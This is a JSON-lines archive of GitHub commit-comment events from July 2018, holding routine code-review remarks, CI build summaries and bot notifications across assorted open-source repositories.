{"id":"7908189735","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29570291,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T18:15:59Z","updated_at":"2018-07-02T18:15:59Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: OK (2801 of 2925 tests passed, 42 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 96 tests had: EIO diffs.\n * 112 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 123 tests had: Table big diffs.\n * 99 tests had: MTR small diffs.\n * 2 tests had: ESO big diffs.\n * 6 tests had: ERR diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 499\n * Failed: 124\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.76%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T18:15:59Z"}
{"id":"7908190290","type":"CommitCommentEvent","actor":{"login":"Snaxeko"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29570292,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T18:16:06Z","updated_at":"2018-07-02T18:16:06Z","author_association":"NONE","body":"But I don't understand the \"randomize damage boss update\"... All planets will be captured it's obvious... Now it's too late for low levels (I was already 23/24 but I always edited the code for low levels)"}},"created_at":"2018-07-02T18:16:06Z"}
{"id":"7908191837","type":"CommitCommentEvent","actor":{"login":"jhnj"},"repo":{"name":"bazelbuild/rules_scala"},"payload":{"comment":{"id":29570298,"position":null,"line":null,"path":null,"commit_id":"e0bb5aef32e178a8225eec62ceae2a700548d423","created_at":"2018-07-02T18:16:25Z","updated_at":"2018-07-02T18:16:25Z","author_association":"CONTRIBUTOR","body":"Thanks! I'll copy it over. I probably want to run at least some tests as duplicates, both 2.11 and 2.12, still figuring that out"}},"created_at":"2018-07-02T18:16:25Z"}
{"id":"7908193328","type":"CommitCommentEvent","actor":{"login":"NikolajBjorner"},"repo":{"name":"Z3Prover/z3"},"payload":{"comment":{"id":29570300,"position":40,"line":128,"path":"src/tactic/core/reduce_invertible_tactic.cpp","commit_id":"a73d0303212d47b10d1740f8b41d74feb906113f","created_at":"2018-07-02T18:16:43Z","updated_at":"2018-07-02T18:16:43Z","author_association":"CONTRIBUTOR","body":"does this work with (forall (x Bool) x)? \r\nIn this formula, x will not have any parents."}},"created_at":"2018-07-02T18:16:43Z"}
{"id":"7908193642","type":"CommitCommentEvent","actor":{"login":"eric-haibin-lin"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29570302,"position":46,"line":87,"path":"example/image-classification/benchmark_score.py","commit_id":"99af59beeb5ea480487575bb06371cc85a35fc21","created_at":"2018-07-02T18:16:47Z","updated_at":"2018-07-02T18:16:47Z","author_association":"CONTRIBUTOR","body":"dt -> dtype?? "}},"created_at":"2018-07-02T18:16:47Z"}
{"id":"7908196363","type":"CommitCommentEvent","actor":{"login":"amineboukili"},"repo":{"name":"amineboukili/workshop-abo-afa"},"payload":{"comment":{"id":29570311,"position":null,"line":null,"path":null,"commit_id":"1d1fc9f95d7707d10637da20d5ac3200e4124bd5","created_at":"2018-07-02T18:17:22Z","updated_at":"2018-07-02T18:17:22Z","author_association":"OWNER","body":"Thank you it's ok for me"}},"created_at":"2018-07-02T18:17:22Z"}
{"id":"7908202430","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570316,"position":29,"line":49,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:18:39Z","updated_at":"2018-07-02T18:18:39Z","author_association":"COLLABORATOR","body":"Это проблема статического использования. Чтобы где-то, неважно где, хотя бы один раз инициализировать статический экземпляр класса, нужен конструктор. А если есть конструктор, то можно создать еще один экземпляр, но при этом потеряется доступ к старому экземпляру. Буду думать. Пока же я удалил метод initInstance."}},"created_at":"2018-07-02T18:18:39Z"}
{"id":"7908204167","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570320,"position":61,"line":73,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:19:03Z","updated_at":"2018-07-02T18:19:03Z","author_association":"COLLABORATOR","body":"Согласен. Переименовываю."}},"created_at":"2018-07-02T18:19:03Z"}
{"id":"7908210771","type":"CommitCommentEvent","actor":{"login":"SivasruthiDandapani"},"repo":{"name":"SivasruthiDandapani/Program"},"payload":{"comment":{"id":29570327,"position":null,"line":null,"path":null,"commit_id":"8ba58d3c1226937b2de90b19f37b2b1e9a8d0fa8","created_at":"2018-07-02T18:20:15Z","updated_at":"2018-07-02T18:20:15Z","author_association":"OWNER","body":"It is a C program"}},"created_at":"2018-07-02T18:20:15Z"}
{"id":"7908211605","type":"CommitCommentEvent","actor":{"login":"lcdservices"},"repo":{"name":"lcdservices/civibooking"},"payload":{"comment":{"id":29570331,"position":17,"line":171,"path":"CRM/Booking/Form/Booking/Base.php","commit_id":"ab825095f9f2c351b7eac17f1625a7bff93e723e","created_at":"2018-07-02T18:20:23Z","updated_at":"2018-07-02T18:20:23Z","author_association":"OWNER","body":"change label to \"Attach File\". remove \"TRUE\" (it should not be required)"}},"created_at":"2018-07-02T18:20:23Z"}
{"id":"7908215308","type":"CommitCommentEvent","actor":{"login":"lcdservices"},"repo":{"name":"lcdservices/civibooking"},"payload":{"comment":{"id":29570339,"position":48,"line":454,"path":"CRM/Booking/Form/Booking/Base.php","commit_id":"ab825095f9f2c351b7eac17f1625a7bff93e723e","created_at":"2018-07-02T18:21:05Z","updated_at":"2018-07-02T18:21:05Z","author_association":"OWNER","body":"use (!empty($result['values'])) -- instead of isset"}},"created_at":"2018-07-02T18:21:05Z"}
{"id":"7908217861","type":"CommitCommentEvent","actor":{"login":"barbudreadmon"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29570343,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-02T18:21:38Z","updated_at":"2018-07-02T18:21:38Z","author_association":"NONE","body":"@twinaphex Are you sure 2P is supposed to work ? First time i try it today and i can't get 2nd player to work, even after rolling back to this commit (for a few minutes i thought my commits this week-end were at fault).\r\n\r\nI tested it on 3 VS games (Guilty Gear XX Accent Core, Hokuto No Ken, Akatsuki Blitzkampf), same result for all of them."}},"created_at":"2018-07-02T18:21:38Z"}
{"id":"7908218201","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570347,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-02T18:21:42Z","updated_at":"2018-07-02T18:21:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:21:42Z"}
{"id":"7908221088","type":"CommitCommentEvent","actor":{"login":"lcdservices"},"repo":{"name":"lcdservices/civibooking"},"payload":{"comment":{"id":29570349,"position":61,"line":467,"path":"CRM/Booking/Form/Booking/Base.php","commit_id":"ab825095f9f2c351b7eac17f1625a7bff93e723e","created_at":"2018-07-02T18:22:23Z","updated_at":"2018-07-02T18:22:23Z","author_association":"OWNER","body":"I don' think we need or want the href parameter. And the construction of it is broken if we do. we should use CRM_Utils_System::url() to construct the URL."}},"created_at":"2018-07-02T18:22:23Z"}
{"id":"7908223370","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570355,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-02T18:22:53Z","updated_at":"2018-07-02T18:22:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:22:53Z"}
{"id":"7908225417","type":"CommitCommentEvent","actor":{"login":"cnlelema"},"repo":{"name":"tinyvmi/tinyvmi"},"payload":{"comment":{"id":29570356,"position":null,"line":null,"path":null,"commit_id":"006847535374f34058620c93a0844f1326c852c3","created_at":"2018-07-02T18:23:21Z","updated_at":"2018-07-02T18:23:21Z","author_association":"COLLABORATOR","body":"This infinite loop in init_kaslr happens on Linux rekall file"}},"created_at":"2018-07-02T18:23:21Z"}
{"id":"7908226824","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29570358,"position":null,"line":null,"path":null,"commit_id":"a013b5f972d33b91eb18e0a06c6e47996955404c","created_at":"2018-07-02T18:23:41Z","updated_at":"2018-07-02T18:23:41Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T18:23:41Z"}
{"id":"7908227951","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29570359,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-02T18:23:56Z","updated_at":"2018-07-02T18:23:56Z","author_association":"MEMBER","body":"I didn't test those games, but 2 player support works just fine with games like Dead or Alive 2 Millennium, Marvel vs Capcom 2, etc."}},"created_at":"2018-07-02T18:23:56Z"}
{"id":"7908228577","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570362,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-02T18:24:05Z","updated_at":"2018-07-02T18:24:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:24:05Z"}
{"id":"7908229363","type":"CommitCommentEvent","actor":{"login":"thefazzer"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29570371,"position":18,"line":43,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T18:24:15Z","updated_at":"2018-07-02T18:24:15Z","author_association":"CONTRIBUTOR","body":"OK I got it - blank line after } unless there is another } to go. \r\nDone."}},"created_at":"2018-07-02T18:24:15Z"}
{"id":"7908230507","type":"CommitCommentEvent","actor":{"login":"lcdservices"},"repo":{"name":"lcdservices/civibooking"},"payload":{"comment":{"id":29570375,"position":67,"line":473,"path":"CRM/Booking/Form/Booking/Base.php","commit_id":"ab825095f9f2c351b7eac17f1625a7bff93e723e","created_at":"2018-07-02T18:24:29Z","updated_at":"2018-07-02T18:24:29Z","author_association":"OWNER","body":"I feel like this should be done with an API call, not direct SQL. and the API call should allow you to avoid the conditional clause. if there's a reason you have it this way, please explain."}},"created_at":"2018-07-02T18:24:29Z"}
{"id":"7908230958","type":"CommitCommentEvent","actor":{"login":"thefazzer"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29570376,"position":5,"line":32,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T18:24:35Z","updated_at":"2018-07-02T18:24:35Z","author_association":"CONTRIBUTOR","body":"Understood - Done."}},"created_at":"2018-07-02T18:24:35Z"}
{"id":"7908233020","type":"CommitCommentEvent","actor":{"login":"somewhatabstract"},"repo":{"name":"Khan/wonder-blocks"},"payload":{"comment":{"id":29570378,"position":29,"line":33,"path":"packages/wonder-blocks-color/util/utils.js","commit_id":"9d00cc749371ee67835ea7c5b0e051ba7e8f8994","created_at":"2018-07-02T18:25:04Z","updated_at":"2018-07-02T18:25:04Z","author_association":"MEMBER","body":"This is new. It caters for the #FFF style colors."}},"created_at":"2018-07-02T18:25:04Z"}
{"id":"7908233109","type":"CommitCommentEvent","actor":{"login":"tedgreen99"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29570379,"position":null,"line":null,"path":null,"commit_id":"a9f194398af68ab8b5cd15b423c4bf77ae661adb","created_at":"2018-07-02T18:25:06Z","updated_at":"2018-07-02T18:25:06Z","author_association":"CONTRIBUTOR","body":"How else would you access the ioports which are defined in the root of the system?"}},"created_at":"2018-07-02T18:25:06Z"}
{"id":"7908234006","type":"CommitCommentEvent","actor":{"login":"frogg"},"repo":{"name":"OasysFoundation/Oasys-Toolbox-React"},"payload":{"comment":{"id":29570380,"position":null,"line":null,"path":null,"commit_id":"f8382a8440a3997da06024b41353acecc81d1e23","created_at":"2018-07-02T18:25:18Z","updated_at":"2018-07-02T18:25:18Z","author_association":"MEMBER","body":"Does this also fix #81 by any chance??"}},"created_at":"2018-07-02T18:25:18Z"}
{"id":"7908234132","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570381,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-02T18:25:19Z","updated_at":"2018-07-02T18:25:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:25:19Z"}
{"id":"7908234454","type":"CommitCommentEvent","actor":{"login":"somewhatabstract"},"repo":{"name":"Khan/wonder-blocks"},"payload":{"comment":{"id":29570382,"position":47,"line":43,"path":"packages/wonder-blocks-color/util/utils.js","commit_id":"9d00cc749371ee67835ea7c5b0e051ba7e8f8994","created_at":"2018-07-02T18:25:23Z","updated_at":"2018-07-02T18:25:23Z","author_association":"MEMBER","body":"This is the same as before and covers #FFFFFF style colours."}},"created_at":"2018-07-02T18:25:23Z"}
{"id":"7908248386","type":"CommitCommentEvent","actor":{"login":"sshen123"},"repo":{"name":"InstructorJoel/HealthCareRepo"},"payload":{"comment":{"id":29570434,"position":null,"line":null,"path":null,"commit_id":"5f409aefeb0d51a04963261351f7fc73320b265a","created_at":"2018-07-02T18:28:30Z","updated_at":"2018-07-02T18:28:30Z","author_association":"COLLABORATOR","body":"The data could be directly import with the code in the capstone project"}},"created_at":"2018-07-02T18:28:30Z"}
{"id":"7908249061","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29570439,"position":null,"line":null,"path":null,"commit_id":"76de95b6c83ce06be126f43ee41d33023d727dd8","created_at":"2018-07-02T18:28:40Z","updated_at":"2018-07-02T18:28:40Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#ci-2](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-02T18:28:40Z"}
{"id":"7908249739","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570444,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-02T18:28:49Z","updated_at":"2018-07-02T18:28:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:28:49Z"}
{"id":"7908251686","type":"CommitCommentEvent","actor":{"login":"jepting"},"repo":{"name":"jepting/hello-world"},"payload":{"comment":{"id":29570449,"position":null,"line":null,"path":null,"commit_id":"232af5077ee11da1ec24419dbd099e2f8e9b593a","created_at":"2018-07-02T18:29:15Z","updated_at":"2018-07-02T18:29:15Z","author_association":"OWNER","body":"-Just another repository"}},"created_at":"2018-07-02T18:29:15Z"}
{"id":"7908252756","type":"CommitCommentEvent","actor":{"login":"jepting"},"repo":{"name":"jepting/hello-world"},"payload":{"comment":{"id":29570452,"position":3,"line":3,"path":"README.md","commit_id":"232af5077ee11da1ec24419dbd099e2f8e9b593a","created_at":"2018-07-02T18:29:29Z","updated_at":"2018-07-02T18:29:29Z","author_association":"OWNER","body":"-Just another repository"}},"created_at":"2018-07-02T18:29:29Z"}
{"id":"7908252981","type":"CommitCommentEvent","actor":{"login":"klausler"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29570454,"position":165,"line":374,"path":"tools/f18/f18.cc","commit_id":"ab46163d6e84aa4fdde0e3149d12fe1049f64f9f","created_at":"2018-07-02T18:29:32Z","updated_at":"2018-07-02T18:29:32Z","author_association":"COLLABORATOR","body":"The only Fortran compiler with a -J option that I could find is gfortran, which interprets `-J dir` as specifying the directory into which new `.mod` files are to be written.\r\n\r\nCray Fortran has `-j`, which recrudesces Fortran '66's rule that DO loops execute at least one iteration."}},"created_at":"2018-07-02T18:29:32Z"}
{"id":"7908254852","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570457,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-02T18:29:57Z","updated_at":"2018-07-02T18:29:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:29:57Z"}
{"id":"7908256466","type":"CommitCommentEvent","actor":{"login":"xiwenjin"},"repo":{"name":"xiwenjin/Bayesian-modeling"},"payload":{"comment":{"id":29570468,"position":null,"line":null,"path":null,"commit_id":"386d4afbf5dcf3f85123631cac2fecd5fbe6dfa2","created_at":"2018-07-02T18:30:19Z","updated_at":"2018-07-02T18:30:19Z","author_association":"OWNER","body":"Heston vegas & HestonCOS with sk-learn (extended example 1)"}},"created_at":"2018-07-02T18:30:19Z"}
{"id":"7908256504","type":"CommitCommentEvent","actor":{"login":"dmarcoux"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29570469,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-02T18:30:20Z","updated_at":"2018-07-02T18:30:20Z","author_association":"COLLABORATOR","body":"Done on PyPI."}},"created_at":"2018-07-02T18:30:20Z"}
{"id":"7908256728","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570470,"position":65,"line":75,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:30:22Z","updated_at":"2018-07-02T18:30:22Z","author_association":"COLLABORATOR","body":"initInstance удалил, но теперь пользуюсь указателем на экземпляр:\r\n    void initClock (uint32_t pllp)\r\n    {\r\n        System::getInstance()->setPLL(16, 336, pllp, 7);\r\n        System::getInstance()->setAHB(RCC_SYSCLK_DIV1, RCC_HCLK_DIV8, RCC_HCLK_DIV8);\r\n        System::getInstance()->start(FLASH_LATENCY_3);\r\n    }\r\nНа самом деле, синглетон - это подготовка к тому, что придется использовать System из других библиотечных классов. Например, он будет нужен для RTC и Timer для учета делителя ABP1/ABP2 при запуске таймера"}},"created_at":"2018-07-02T18:30:22Z"}
{"id":"7908260246","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570477,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-02T18:31:09Z","updated_at":"2018-07-02T18:31:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:31:09Z"}
{"id":"7908265370","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570492,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-02T18:32:19Z","updated_at":"2018-07-02T18:32:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:32:19Z"}
{"id":"7908265936","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570494,"position":66,"line":76,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:32:26Z","updated_at":"2018-07-02T18:32:26Z","author_association":"COLLABORATOR","body":"Конечно константы. У F4 эти параметры - просто цифры, никаких макросов для этих констант не предусмотрено.  Это уже отличие от младших серий."}},"created_at":"2018-07-02T18:32:26Z"}
{"id":"7908267411","type":"CommitCommentEvent","actor":{"login":"just44play"},"repo":{"name":"just44play/hello-world"},"payload":{"comment":{"id":29570502,"position":null,"line":null,"path":null,"commit_id":"34371e460c39687027e8791a2fefe7ef1e3e38d1","created_at":"2018-07-02T18:32:46Z","updated_at":"2018-07-02T18:32:46Z","author_association":"OWNER","body":"eee"}},"created_at":"2018-07-02T18:32:46Z"}
{"id":"7908270596","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570514,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-02T18:33:30Z","updated_at":"2018-07-02T18:33:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:33:30Z"}
